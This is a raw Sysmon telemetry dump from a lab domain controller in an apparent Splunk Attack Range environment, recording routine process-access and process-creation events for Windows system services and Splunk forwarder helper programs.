14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.553{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.398{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.398{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.398{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.396{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.834{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.224{59A5CD1D-95BA-6005-6705-00000000A301}68165108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d